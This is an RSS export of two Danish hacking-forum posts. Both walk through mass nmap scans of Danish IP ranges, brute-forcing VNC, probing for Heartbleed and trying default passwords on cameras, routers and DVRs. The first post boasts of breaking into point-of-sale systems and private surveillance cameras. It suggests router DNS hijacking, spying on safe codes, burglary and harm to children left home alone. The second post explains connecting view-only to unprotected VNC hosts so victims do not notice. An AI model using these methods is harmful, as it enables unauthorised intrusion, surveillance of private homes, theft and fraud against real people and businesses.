<span style="font-size: medium;" class="mycode_size">Tilfældige hjem:</span><br />
<img src="http://anony.ws/i/2014/09/02/priv1.png" alt="[Billede: priv1.png]" class="mycode_img" /> <br />
<br />
<br />
<span style="font-size: medium;" class="mycode_size">Lidt blandede routere (Og en IP-telefon):</span><br />
<img src="http://anony.ws/i/2014/09/04/random.png" alt="[Billede: random.png]" class="mycode_img" /><br />
<br />
<br />
<span style="font-size: medium;" class="mycode_size">En rar mand og en Heat Controller:</span><br />
<img src="http://anony.ws/i/2014/09/02/vibe.png" alt="[Billede: vibe.png]" class="mycode_img" /> </div>
<br />
<span style="font-size: large;" class="mycode_size"><br />
<span style="color: #FF0000;" class="mycode_color">Vil lige igen nævne, at dette LANGT fra er det saftigste jeg har fundet, og kun skal opfattes som en lille demonstration. Mulighederne for at begå diverse former for kriminalitet (Også den syge slags) er ubegrænsede når først man har adgang til direkte videoovervågning eller har et fodfæste i netværket!</span></span>]]></description>
			<content:encoded><![CDATA[<span style="font-style: italic;" class="mycode_i">Havde oprindeligt tænkt mig at kalde denne lille frækkert for ’<span style="font-weight: bold;" class="mycode_b">Kedsomhedshacking med NMAP</span>’, da det er en af de utallige ting jeg kan benytte mig af hvis jeg af en eller anden grund ikke har alverden at give mig til. Valgte dog hurtigt at skifte overskrft, da det gik op for mig, at størstedelen nok ville finde dette mere <span style="text-decoration: underline;" class="mycode_u">spændende end kedeligt</span>.</span> <br />
<br />
EDIT:<br />
Satans. Havde glemt det igen. Har skåret ned fra 35 til 10 billeder! ;)<br />
Blev en halv-lang og rodet smøre, så må lige se om ikke jeg kan indskrænke det lidt.<br />
Har heller ikke stavekontrol på dyret her, så det bliver ordnet senere.<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Introduktion</span></span><br />
Det er ABSOLUT ikke noget nyt, og min overbevisning er, at mange herinde allerede har været noget lignende igennem. Det er bare sådan, at når man normalt bruger NMAP, så er det for at skanne et målrettet offer (En IP-adresse eller et netværk) - eller også er det for at skanne efter specifikke porte og fejl i diverse services).<br />
Her vil vi nøjes med at skanne efter de mest brugte porte, som benyttes af alle de forskellige enheder som er forbundet til internettet (Om det så er meningen at de skal være det eller ej er en anden sag).<br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Krav</span></span><br />
<span style="font-weight: bold;" class="mycode_b">NMAP</span> – Her bruger vi <span style="font-weight: bold;" class="mycode_b">Zenmap</span> - for at ydnytte den <span style="text-decoration: underline;" class="mycode_u">grafiske brugerflade</span>, samt <span style="font-weight: bold;" class="mycode_b">lettere tilgang</span> til <span style="text-decoration: underline;" class="mycode_u">tidligere gennemførte skanninger, profiler, plugins osv.</span> <a href="http://nmap.org/download.html" target="_blank" rel="noopener" class="mycode_url">http://nmap.org/download.html</a>)<br />
<span style="font-weight: bold;" class="mycode_b">Et styresystem</span> som <span style="text-decoration: underline;" class="mycode_u">understøttes af NMAP</span> (<span style="font-style: italic;" class="mycode_i">Windows, Linux eller Mac</span>)<br />
<span style="font-style: italic;" class="mycode_i">Zenmap har samme funktioner og brugerflade uafhængig af styresystem, så lige meget hvilket et du foretrækker, vil du stadig være i stand til at følge denne ’tutorial’ uden at afvige fra mine parametre.</span><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Zenmap</span> Vs. <span style="font-weight: bold;" class="mycode_b">Shodan</span> Vs. <span style="font-weight: bold;" class="mycode_b">Google Dorks</span></span><br />
<span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">Lad os lige få dette på det rene før vi begynder at skanne!</span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Google Dorks</span></span><br />
<a href="http://www.exploit-db.com/google-dorks/" target="_blank" rel="noopener" class="mycode_url">http://www.exploit-db.com/google-dorks/</a><br />
<span style="font-weight: bold;" class="mycode_b">Google Dorks</span> er helt sikkert en sjov måde at finde diverse <span style="text-decoration: underline;" class="mycode_u">servere, overvågningskameraer, routere osv</span>. med, men der er også nogle småting der gør det mindre attraktivt at benytte:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite><span style="font-weight: bold;" class="mycode_b">- Enhederne skal på forhånd være crawled/cached af Google<br />
- Enhederne må ikke have dynamisk IP<br />
- En million-milliard 1337-HaX0rZ har allerede kendskab til enheder du vil kunne finde igennem Google.</span></blockquote>
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Shodan</span></span><br />
<a href="http://www.shodanhq.com/" target="_blank" rel="noopener" class="mycode_url">http://www.shodanhq.com/</a><br />
<span style="font-weight: bold;" class="mycode_b">Shodan</span> er et fantastisk projekt, og helt sikkert et jeg har haft min fair andel sjov med. Desværre er flere af de ting der kan ses som <span style="text-decoration: underline;" class="mycode_u">uattraktive</span> ved <span style="font-weight: bold;" class="mycode_b">Google Dorks</span> dog <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">også gældende her</span></span>:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>- Enhederne skal på forhånd være registreret i Shodans database (Hvis enheden var slukket da Shodans skanningsmotor kørte deres ping/banner grab, vil denne enhed være blevet sprunget over)<br />
- Igen må de ikke have dynamisk IP – Så snart de skifter IP vil det kræve at Shodan – tilfældigt – støder på dem igen<br />
- Igen har et HAV af personer allerede kørt listerne igennem uanede gange<br />
- Koster penge hvis du vil mere end bare skimte til et par søgeresultater</blockquote>
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">Zenmap/NMAP</span></span><br />
Med <span style="font-weight: bold;" class="mycode_b">Zenmap</span> <span style="text-decoration: underline;" class="mycode_u">skanner vi hele rækker af IP’er,</span> og vil derfor <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">ikke være påvirket af de samme begrænsninger som de 2 ovenstående eksempler.</span></span> Er en IP online, så ved vi med det samme at der er liv i en enhed af en slags. Kører selvskabet bag forbindelsen med et setup af dynamiske IP’er, så har vi stadig samme problem som før, men det er også en af det eneste negative sider fra de 2 andre metoder vi støder på)<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Let’s Do It</span></span><br />
<span style="font-style: italic;" class="mycode_i">Undskylder på forhånd at jeg har fjernet den IP række jeg på nuværende tidspunkt skanner igennem – Det er en guldmine</span> ;)<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Hvis du ikke lige har en liste over danske IP adresser, kan du som udgangspunkt gå til <a href="http://www.whatismyip.com/" target="_blank" rel="noopener" class="mycode_url">http://www.whatismyip.com/</a> eller <a href="http://myip.dk/" target="_blank" rel="noopener" class="mycode_url">http://myip.dk/</a> og starte ud med din egen IP. Her kan du så gå op og ned indtil du ikke længere finder resultater der stammer fra en dansk ydbyder. Efter det, kan du begynde at kigge på danske webhost- og email udbydere. </blockquote>
 <br />
Opsætningen er meget lig den fra min sidste NMAP tutorial, så følgende er gældende:<br />
<br />
<img src="http://anony.ws/i/2014/09/02/n1.png" alt="[Billede: n1.png]" class="mycode_img" /><br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>nmap -p 22,23,80,443,445,8080,5900 --open --script vnc-brute,ssl-heartbleed xx.xx.231-236.1-255</blockquote>
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite><span style="font-weight: bold;" class="mycode_b">nmap:</span> Giver sig selv. Det er det program vi kører - resten er parametre.<br />
<span style="font-weight: bold;" class="mycode_b">-p</span> - Dette er portene vi vil skanne efter: <br />
<blockquote class="mycode_quote"><cite>Citer:</cite>- <span style="font-weight: bold;" class="mycode_b">22</span> (<span style="font-style: italic;" class="mycode_i">SSH</span>)<br />
- <span style="font-weight: bold;" class="mycode_b">23</span> (<span style="font-style: italic;" class="mycode_i">Telnet</span>)<br />
- <span style="font-weight: bold;" class="mycode_b">80</span> (<span style="font-style: italic;" class="mycode_i">HTTP</span>)<br />
- <span style="font-weight: bold;" class="mycode_b">443</span> (<span style="font-style: italic;" class="mycode_i">HTTPS</span>)<br />
- <span style="font-weight: bold;" class="mycode_b">445</span> (<span style="font-style: italic;" class="mycode_i">SMB</span>)<br />
- <span style="font-weight: bold;" class="mycode_b">8080</span> (<span style="font-style: italic;" class="mycode_i">Alternativ til port 80, bruges af flere forskellige services</span>)<br />
- <span style="font-weight: bold;" class="mycode_b">5900</span> (<span style="font-style: italic;" class="mycode_i">VNC</span>)</blockquote>
<span style="font-weight: bold;" class="mycode_b">--open:</span> <span style="font-weight: bold;" class="mycode_b">Begrænser</span> vores skanningen til <span style="font-weight: bold;" class="mycode_b">KUN</span> at vise resultater med <span style="text-decoration: underline;" class="mycode_u">åbne porte</span>. Uden dette vil vi få en væg af tekst med <span style="text-decoration: underline;" class="mycode_u">lukkede og firewalled porte</span>.<br />
<span style="font-weight: bold;" class="mycode_b">--script vnc-brute,ssl-heartbleed:</span> Her vælger vi de script der skal testes på alle online maskiner med <span style="font-weight: bold;" class="mycode_b">portene 5900 og/eller 445 åbne</span>. <span style="font-weight: bold;" class="mycode_b">VNC Brute-Force</span> angreb på opsætninger der <span style="text-decoration: underline;" class="mycode_u">udelukkende</span> kører med <span style="text-decoration: underline;" class="mycode_u">ingen eller svage kodeord</span> (<span style="font-style: italic;" class="mycode_i">Og ingen brug af brugernavne</span>) og <span style="text-decoration: underline;" class="mycode_u">Heartbleed SSL sårbarheden</span>.<br />
<span style="font-weight: bold;" class="mycode_b">xx.xx.231-236.1-255:</span> IP-adresserne der skal skannes efter. </blockquote>
 -- <span style="text-decoration: underline;" class="mycode_u">Vi kan bare fylde på af de porte der tilhører diverse services vi er interesserede i.</span><br />
<span style="font-style: italic;" class="mycode_i">Tag for eksempel et hurtigt kig efter ”POS manual” eller ”Point-of-Sale Manual” eller ”payment terminal manual” på Google – de har i de fleste tilfælde portene stående under setup/konfiguration.</span><br />
<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Hvis vi nu er så heldige at støde på en VNC server uden kodeord, vil vi få følgende output af Zenmap:</span><br />
<br />
<img src="http://anony.ws/i/2014/09/02/nvnc.png" alt="[Billede: nvnc.png]" class="mycode_img" /><br />
<br />
<br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-weight: bold;" class="mycode_b">(Her kan vi så bruge en hvilket som helst VNC klient / Viewer til at forbinde til værtscomputeren)</span></span><br />
<br />
<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Hvorimod hvis vi støder på en forbindelse der endnu ikke er patched mod heartbleed sårbarheden, så vil vi få følgende output:</span><br />
<br />
<img src="http://anony.ws/i/2014/09/02/nssl.png" alt="[Billede: nssl.png]" class="mycode_img" /><br />
<br />
<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">(Her kan vi så bruge de uendeligt mange Heartbleed scripts til at dumpe hukommelse, hvilket kan være alt fra Kredit Kort, Session, Bruger+Kodeord, Tilfældig HTML osv.) </span></span><br />
<br />
I langt de fleste tilfælde vil <span style="font-weight: bold;" class="mycode_b">HTTP</span> (<span style="text-decoration: underline;" class="mycode_u">port 80</span>) og <span style="font-weight: bold;" class="mycode_b">HTTPS</span> (<span style="text-decoration: underline;" class="mycode_u">port 445</span>) dog være de porte vi vil være interesserede i, og hvor vi kan få adgang via vores browser til alle mulige forskellige slags enheder/services.<br />
<span style="font-style: italic;" class="mycode_i">Og hvis vi nu finder en IP vi gerne vil have lidt ekstra informationer om, såsom styresystem, service-scan og andre åbne porte, så kan vi jo bare kopiere IP adressen ind som ’Target’ og køre f. eks. ’Regular Scan’ eller en af de andre profiler (Eller opsætte vores egen profil).</span><br />
<br />
<img src="http://anony.ws/i/2014/09/02/n2.png" alt="[Billede: n2.png]" class="mycode_img" /><br />
<br />
<br />
<br />
Nu er der ikke rigtig andet at gøre, end at kopiere disse IP’er ind i vores browser, og se hvad vi støder på. Hvis det er <span style="font-weight: bold;" class="mycode_b">SSL/HTTPS</span>, så<span style="text-decoration: underline;" class="mycode_u"> husk at skrive ’<span style="font-weight: bold;" class="mycode_b">https://</span>’ foran <span style="font-weight: bold;" class="mycode_b">IP’en</span>.</span><br />
<span style="font-weight: bold;" class="mycode_b">De fleste af disse enheder vil kræve at du logger ind, før du kan ændre indstillinger, se systemstatus eller se live video</span>. Her ville det bedste være at <span style="font-weight: bold;" class="mycode_b">søge</span> efter lige <span style="font-weight: bold;" class="mycode_b">præcis den enhed</span> du er <span style="font-weight: bold;" class="mycode_b">havnet i</span>, efterfulgt af ’<span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">default password</span></span>’. <span style="text-decoration: underline;" class="mycode_u">Her er et par eksempler:</span><br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>D-Link default password<br />
Linksys default password<br />
CamEye default password</blockquote>
<br />
<span style="font-weight: bold;" class="mycode_b">Her er min liste over <span style="text-decoration: underline;" class="mycode_u">mest udbredte kodeord</span> – De vil <span style="text-decoration: underline;" class="mycode_u">IKKE</span> komme som en overaskelse</span> ;)<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Brugernavn: admin<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>’ ’ - Tomt kodeord<br />
’admin’<br />
’1234’<br />
’12345’<br />
’123456’<br />
’4321’<br />
’1111’<br />
‘11111111’</blockquote></blockquote>
<br />
<br />
<br />
Blandt andet mange <span style="font-weight: bold;" class="mycode_b">DVR eller IPCam</span> enheder kræver forskellige <span style="font-weight: bold;" class="mycode_b">browsere</span>, og <span style="font-weight: bold;" class="mycode_b">plugins</span>. <span style="text-decoration: underline;" class="mycode_u">Internet Explorer</span> er meget udbredt blandt kompatible browsere når det kommer til de lidt <span style="font-weight: bold;" class="mycode_b">ældre enheder.</span> <span style="text-decoration: underline;" class="mycode_u">Her kræves det man ændrer lidt i IE’s instillinger</span> for at få lov til at installere <span style="font-weight: bold;" class="mycode_b">usignerede drivers og plugins</span>. Det er bare et spørgsmål om at prøve.<br />
<br />
Der er sindsygt mange enheder inden for hvad vi kan kalde <span style="font-weight: bold;" class="mycode_b">Danmarks Kritiske Infrastruktur</span>, <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">som ikke burde være frit tilgængeligt over internettet</span></span>. Alligevel har jeg fundet uhyggeligt mange af disse, og det er direkte fucked-up. <span style="font-weight: bold;" class="mycode_b">Dem får i dog ikke lov at se.</span> <span style="font-style: italic;" class="mycode_i">Men med et par timers søgning, er jeg sikker på i selv hurtigt vil få øje på hvor udbredt det er. Vi snakker el- og vandværker der står komplet åbne og klar til at blive angrebet.</span><br />
<br />
<span style="font-size: x-large;" class="mycode_size">Hvad kan vi så bruge det til?</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">En hel række ting. Her er et par eksempler:</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">Køre din egen DNS server</span><br />
Og indtaste dennes IP i forskellige routere du finder. Det kan du bruge til at sniffe folks oplysninger, eller inficere dem ved hjælp af BeeF, Metasploit eller et Exploit Kit.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">Udspionere folk eller virksomheder</span><br />
 I ville blive FORBLØFFET hvis i vidste hvor mange overvågningssystemer jeg har fundet, hvis eneste formål er at holde vagt over virksomhedens/personens pengeskab – uviddende om at en tredjepart(mig) kan sidde og kigge med når de indtaster/drejer koden ind. Det samme gælder når det kommer til alarmpaneler/tyverialarmer. Disse kan også sidde lige i skudlinien for deres overvågning.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">Indbrud/Røverier</span><br />
Ikke bare alarmpaneler og pengeskabe kan bruges når det kommer til denne type kriminalitet. Hvis du har adgang til et hjems overvågning, har du adgang til deres dagligdag, vaner, husets layout eventuelle steder de gemmer deres egendele.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">Voldtægt?</span><br />
Det er nu ikke noget jeg går særlig meget op i ;)<br />
Men har en lang række kameaer der er opsat i og omkring familiehjem. Der kan jeg se når forældrene tager på arbejde, og efterlader børnene alene indtil de selv skal i skole. Hvis en psykisk syg person får fat i et sådan overvågningsystem, ville han kunne udnytte det til noget meget grimt.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">(D)DoS angreb</span><br />
Alle disse systemer har utrollight dårlig sikkerhed, og hvis du kan DDoS’e eller DoS’e et system, vil f. eks. deres overvågningssystem være ubrugeligt, og forskellige forbrydelser vil kunne begåes uden at du bliver optaget på bånd eller harddisk.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">Bruge det til fremtidige angreb</span><br />
Der er mange muligheder for at bruge disse enheder til fremtidige angreb. Er telnet aktiveret? Er SSH aktiveret, og kan det brute-forces? Kan enhedens firmware opdateres? Og i så fald, kan du finde firmwaren og reverse engineer den? - Langt størstedelen af plugins er usignerede, og der er ingen tjek der sørger for at disse rent faktisk stammer fra det rette sted.<br />
Hvis du kan, kan du inficere browser plugins, køre command injection, installere SSH eller Netcat, aktivere telnet osv.<br />
Når du har adgang til selve enheden, og ikke bare dens interface, er der næsten 100% chance for at du kan få adgang til andre enheder og computere på netværket. <br />
Du kan jo overføre NMAP til enheden, og skanne hele netværket igennem – UDEN at skulle være bekymret for eventuelle firewalls.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Personligt har jeg brugt denne metode til at få adgang til blandt andet POS systemer over alt i landet. Dette har selvfølgelig udelukkende været for ’<span style="text-decoration: underline;" class="mycode_u">educational purposes</span>’ </span>;)</span><br />
<br />
Den letteste var nok en tankstation der brugte admin/admin til deres online DVR system. Dette DVR system tilladte brugeren at opsætte FTP og Telnet adgang til enheden, og brugte igen admin/admin til forbindelsen. Jeg overførte NMAP, og efter ganske få minutter havde jeg adgang til alle terminalerne, som ovenikøbet ikke havde noget der bare mindede om AV eller IDS. Altså var det næsten skæbnen at de ville have mig til at installere Dexter eller BlackPOS...<br />
I et andet tilfælde kunne jeg køre Netcat igennem reverse engineered firmware, og herefter var historien næsten den samme som før.  Har dog også bricked en helvedes masse enheder ved det. Så det er ikke mit første valg.<br />
Og som nævnt før, så har jeg op til flere forskellige kombinationer til diverse pengeskabe fra en håndfuld firmaer – blandt andet en restaurant jeg er blevet lidt forelsket i. Jeg kan desværre ikke vise jer de aller saftigste fangster, men her er lige lidt blandet for at få en idé om hvad man kan få adgang til:<br />
<br />
<div style="text-align: center;" class="mycode_align">
<span style="font-size: medium;" class="mycode_size">Et casino (Hvor er det?):</span><br />
<img src="http://anony.ws/i/2014/09/02/casino.png" alt="[Billede: casino.png]" class="mycode_img" /><br />
<br />
 <br />
<span style="font-size: medium;" class="mycode_size">En kiosk:</span><br />
<img src="http://anony.ws/i/2014/09/02/quick.png" alt="[Billede: quick.png]" class="mycode_img" /> <br />
<br />
<br />
<span style="font-size: medium;" class="mycode_size">En restaurrant:</span><br />
<img src="http://anony.ws/i/2014/09/02/rest.png" alt="[Billede: rest.png]" class="mycode_img" /> <br />
<br />
<br />
<span style="font-size: medium;" class="mycode_size">Tilfældige hjem:</span><br />
<img src="http://anony.ws/i/2014/09/02/priv1.png" alt="[Billede: priv1.png]" class="mycode_img" /> <br />
<br />
<br />
<span style="font-size: medium;" class="mycode_size">Lidt blandede routere (Og en IP-telefon):</span><br />
<img src="http://anony.ws/i/2014/09/04/random.png" alt="[Billede: random.png]" class="mycode_img" /><br />
<br />
<br />
<span style="font-size: medium;" class="mycode_size">En rar mand og en Heat Controller:</span><br />
<img src="http://anony.ws/i/2014/09/02/vibe.png" alt="[Billede: vibe.png]" class="mycode_img" /> </div>
<br />
<span style="font-size: large;" class="mycode_size"><br />
<span style="color: #FF0000;" class="mycode_color">Vil lige igen nævne, at dette LANGT fra er det saftigste jeg har fundet, og kun skal opfattes som en lille demonstration. Mulighederne for at begå diverse former for kriminalitet (Også den syge slags) er ubegrænsede når først man har adgang til direkte videoovervågning eller har et fodfæste i netværket!</span></span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Ydnyttelse af manglende/svage VNC opsætninger]]></title>
			<link>https://www.shellsec.pw/traad-ydnyttelse-af-manglende-svage-vnc-opsaetninger</link>
			<pubDate>Sat, 16 Aug 2014 16:13:15 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-ydnyttelse-af-manglende-svage-vnc-opsaetninger</guid>
			<description><![CDATA[<span style="color: #FF0000;" class="mycode_color">(Var lidt i tvivl om hvor den skulle placeres. Synes ikke helt brute-force var den rigtige sektion)</span><br />
<br />
Sad og nød min morgenkaffe sammen med dagens diverse nyheder, da jeg faldt over denne artikel fra Sophos' NakedSecurity blog:<br />
<span style="color: #4682B4;" class="mycode_color">(</span> <a href="https://nakedsecurity.sophos.com/2014/08/15/thousands-of-computers-open-to-eavesdropping-and-hijacking/" target="_blank" rel="noopener" class="mycode_url">https://nakedsecurity.sophos.com/2014/08...hijacking/</a> <span style="color: #4682B4;" class="mycode_color">)</span><br />
Det går i bund og grund ud på at skanne ip-rækker for VNC, og så teste om disse er usikre opsat og ikke benytter kodeord til fjernforbindelsen.<br />
<br />
Havde ikke selv tænkt på at dette var et problem der var så omfattende igen. Sidder ofte og skanner store rækker af IP'er igennem, og port 5900(standart VNC port) er alt efter mine intentioner en port jeg tit tilføjer til listen (Sammen med porten til den specifikke service jeg prøver at skaffe adgang til).<br />
Tænkte det ville være en god idé lige at afprøve deres fund selv, for at få et større indblik i, om dette nu også er et problem herhjemme i Danmark.<br />
<br />
Idéen var egentligt at skrive et lille hurtigt script til Nmap ved hjælp af NSE(Nmap Scripting Engine) og dettes tilhørende VNC library. Men før jeg nåede at lave mere end Head og Rule sektionerne (NSE består af Head, Rule og en Action sektion), faldt jeg over dette handy script:<br />
<span style="color: #4682B4;" class="mycode_color">(</span> <a href="https://svn.nmap.org/nmap/scripts/vnc-brute.nse" target="_blank" rel="noopener" class="mycode_url">https://svn.nmap.org/nmap/scripts/vnc-brute.nse</a> <span style="color: #4682B4;" class="mycode_color">)</span><br />
<br />
Hvad dette script gør, er at forbinde til en VNC service under skanningen, teste om forbindelsen kræver brugernavn OG kodeord eller KUN et kodeord. Hvis det eneste krav er et kodeord, forsøger scriptet at brute-force dette med de sædvanlige svage loginoplysninger vi stadig ser blive brugt.<br />
Af 'svage loginoplysninger' må siges at Intet Kodeord helt klart topper listen, og dette er der også taget hensyn for i vnc-brute.<br />
<br />
Jeg har endnu ikke været så heldig at brute-force et eksiterende kodeord, men tilgengældt har jeg fundet Massere af klienter der ikke har anvendt kodeord.<br />
<br />
Hvis det er noget i kunne tænke jer at give et forsøg, er det egentlig en UTROLIG let process. Selv for dem som måske ikke har brugt Nmap før.<br />
Her er en lille 'overflødig' gennemgang til jer der ikke har leget med det før:<br />
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size"><span style="color: #006400;" class="mycode_color">1) Download og installér Nmap - eller Zenmap (GUI version med grafisk brugerflade)</span></span></span><br />
<a href="http://nmap.org/zenmap/" target="_blank" rel="noopener" class="mycode_url">http://nmap.org/zenmap/</a><br />
<span style="font-style: italic;" class="mycode_i">Har man Kali/Backtrack eller et andet sikkerheds-orienteret styresystem, burde Nmap selvfølgelig allerede være installeret. </span><br />
<img src="https://www.anonimg.com/img/e6f77f16aa0da6c35cd87a0425e2267b.png" alt="[Billede: e6f77f16aa0da6c35cd87a0425e2267b.png]" class="mycode_img" /><br />
<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size"><span style="color: #006400;" class="mycode_color">2) Du skal efterhånden køre en Gammel version af Nmap for at dette script ikke er pakket sammen med programmet, men hvis du gør, så OPDATER for pokker. Hvis dette ikke er en mulighed, så kan scriptet downloades på nedenstående link:</span></span></span><br />
<a href="https://svn.nmap.org/nmap/scripts/vnc-brute.nse" target="_blank" rel="noopener" class="mycode_url">https://svn.nmap.org/nmap/scripts/vnc-brute.nse</a><br />
<img src="https://www.anonimg.com/img/e87d84ece28b458225c78f725a4f5d05.png" alt="[Billede: e87d84ece28b458225c78f725a4f5d05.png]" class="mycode_img" /><br />
<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size"><span style="color: #006400;" class="mycode_color">3) Nu kører vi Nmap eller Zenmap med følgende parametre (Om det er Nmap eller Zenmap er fuldstændig lige meget. Zenmap er KUN en integreret grafisk brugerflade til Nmap, og alle kommandoer og valgmuligheder er de samme:</span></span></span><br />
<blockquote class="mycode_quote"><cite>Citer:</cite><div style="text-align: left;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b">nmap -p 5900 --open --script vnc-brute 127.0.0.1</span></div></blockquote>
<br />
<img src="https://www.anonimg.com/img/f5e7d6116e09e8628c2c2b956f43b570.png" alt="[Billede: f5e7d6116e09e8628c2c2b956f43b570.png]" class="mycode_img" /></div>
<br />
<div style="text-align: center;" class="mycode_align"><blockquote class="mycode_quote"><cite>Citer:</cite><div style="text-align: left;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #1E90FF;" class="mycode_color">nmap:</span></span> Giver sig selv. Det er det program vi kører - resten er parametre.<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #1E90FF;" class="mycode_color">-p 5900:</span></span> Dette er porten vi vil skanne efter. (Her kan vi også skanne efter flere porte på éen gang - f. eks. -p 21,22,23,80,443,500-700 - sidstnævnte skanner alle porte i rækken 500 - 700. Et godt eksempel her kunne være at skanne efter en kendt port til et stykke Point-of-Sale software og samtidig se om maskinen det kører på tillader fjernstyrring.  <br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #1E90FF;" class="mycode_color">--open:</span></span> Begrænser vores skanningen til KUN at vise resultater med åbne porte. Uden dette vil vi få en væg af tekst med lukkede og firewalled porte.<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #1E90FF;" class="mycode_color">--script vnc-brute:</span></span> Her vælger vi det script der skal testes på alle online maskiner med port 5900 åben. (Hvis scriptet ikke er pakket med Nmap kan du bruge '<span style="font-style: italic;" class="mycode_i">--script "C:\\StienTilFilen\\vnc-brute.nse"</span>'.<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #1E90FF;" class="mycode_color">127.0.0.1:</span></span> IP-adressen eller rækken der skal skannes efter. Hvis du vil skanne en række frem for en enkelt IP kan følgende bruges: <br />
<span style="font-weight: bold;" class="mycode_b">47.148.151.1-255</span> - Skanner 47.148.151.1 til 47.148.151.255<br />
<span style="font-weight: bold;" class="mycode_b">47.148.151-160.1-255</span> - Skanner 47.148.151.1 til 47.148.160.255</div></blockquote>
<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Når Nmap finder en VNC service der <span style="font-style: italic;" class="mycode_i">ikke</span> bruger kodeord, får vi fælgende output:</span><br />
<blockquote class="mycode_quote"><cite>Citer:</cite><div style="text-align: left;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #32CD32;" class="mycode_color">5900/tcp open  vnc<br />
<br />
|_vnc-brute: No authentication required</span></span></div></blockquote>
<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Hvis der bare står følgende (Uden VNC-Brute output):</span><br />
<blockquote class="mycode_quote"><cite>Citer:</cite><div style="text-align: left;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #FF6347;" class="mycode_color">5900/tcp open  vnc</span></span></div></blockquote>
<span style="font-style: italic;" class="mycode_i"><span style="font-weight: bold;" class="mycode_b">Betyder det et brugernavn også er krævet.</span></span><br />
<br />
<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size"><span style="color: #006400;" class="mycode_color">4) Nu kan vi så bruge RealVNC til at forbinde til IP-adressen:</span></span></span><br />
<a href="https://www.realvnc.com/download/" target="_blank" rel="noopener" class="mycode_url">https://www.realvnc.com/download/</a><br />
<span style="font-style: italic;" class="mycode_i">Download <span style="font-weight: bold;" class="mycode_b">VNC Viewer</span>. Det virker til alle de store styresytemer, og der er ingen grund til at hente den fulde pakke, da vi ikke har tænkt os at køre en server. </span><br />
<img src="https://www.anonimg.com/img/f7f272529348da33dcb050bf98f7e269.png" alt="[Billede: f7f272529348da33dcb050bf98f7e269.png]" class="mycode_img" /><br />
<br />
Her ville det være smart - <span style="color: #FF0000;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">FØR</span></span> - du trykker på <span style="font-weight: bold;" class="mycode_b">connect</span>, at gå ind i '<span style="font-weight: bold;" class="mycode_b">OPTIONS</span>' og trykke på den checkbox under '<span style="font-weight: bold;" class="mycode_b">Input</span>' der hedder '<span style="font-weight: bold;" class="mycode_b">View-only</span>'. Dette gør er vores tastatur og mus ikke forstyrre brugeren, og derved afslører vores tilstedeværelse.<br />
<img src="https://www.anonimg.com/img/3a927d9f555f24e27d5662d78c1f6ca3.png" alt="[Billede: 3a927d9f555f24e27d5662d78c1f6ca3.png]" class="mycode_img" /></div>
<br />
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #FF1493;" class="mycode_color">Her er der lige et par eksempler på, hvad man kan være heldig at få adgang til:</span></span></span><br />
<br />
<br />
